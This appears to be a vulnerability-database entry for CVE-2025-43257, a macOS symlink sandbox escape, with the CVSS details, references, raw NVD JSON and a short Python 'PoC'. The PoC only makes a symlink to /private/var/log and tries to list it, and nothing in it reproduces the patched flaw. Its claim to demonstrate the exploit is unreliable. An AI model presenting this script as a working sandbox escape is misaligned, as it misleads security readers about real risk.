CVE-2025-43257

Description

This issue was addressed with improved handling of symlinks. This issue is fixed in macOS Sequoia 15.6. An app may be able to break out of its sandbox.

CVSS Details

CVSS Score

8.7

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:L

Configurations (Affected Products)

cpe:2.3:o:apple:macos:*:*:*:*:*:*:*:* - VULNERABLE

macOS Sequoia < 15.6

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# PoC for CVE-2025-43257: macOS Symlink Sandbox Escape
# Description: This script demonstrates the concept of creating a symlink
# to a restricted directory outside the sandbox to test the vulnerability.
import os

def check_sandbox_escape():
    # Target a directory typically restricted by the sandbox
    target_dir = "/private/var/log"
    link_name = "exploit_symlink"

    print(f"[*] Attempting to create symlink to {target_dir}...")

    try:
        # Create the symbolic link
        os.symlink(target_dir, link_name)
        print("[+] Symlink created successfully.")

        # Attempt to read the directory contents via the symlink
        # If the sandbox is bypassed, this should succeed
        files = os.listdir(link_name)
        print(f"[!] SUCCESS: Read directory contents: {files[:5]}...")
        print("[!] This indicates a potential Sandbox Escape.")

    except PermissionError:
        print("[-] Permission denied. Sandbox is likely intact.")
    except OSError as e:
        print(f"[-] OS Error: {e}")
    except Exception as e:
        print(f"[-] Unexpected error: {e}")
    finally:
        # Clean up the symlink
        if os.path.islink(link_name):
            os.remove(link_name)
            print("[*] Cleaned up symlink.")

if __name__ == "__main__":
    check_sandbox_escape()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-43257
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-43257
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-43257/
[4] VulDB https://vuldb.com/cve/CVE-2025-43257
[5] https://support.apple.com/en-us/124149

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-43257", "sourceIdentifier": "[email protected]", "published": "2026-04-02T19:20:15.797", "lastModified": "2026-04-03T17:57:19.197", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "This issue was addressed with improved handling of symlinks. This issue is fixed in macOS Sequoia 15.6. An app may be able to break out of its sandbox."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:L", "baseScore": 8.7, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.0, "impactScore": 6.0}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-59"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:apple:macos:*:*:*:*:*:*:*:*", "versionEndExcluding": "15.6", "matchCriteriaId": "077E4BB7-4A8B-4D18-BCD7-2938A2B8B9C8"}]}]}], "references": [{"url": "https://support.apple.com/en-us/124149", "source": "[email protected]", "tags": ["Release Notes", "Vendor Advisory"]}]}}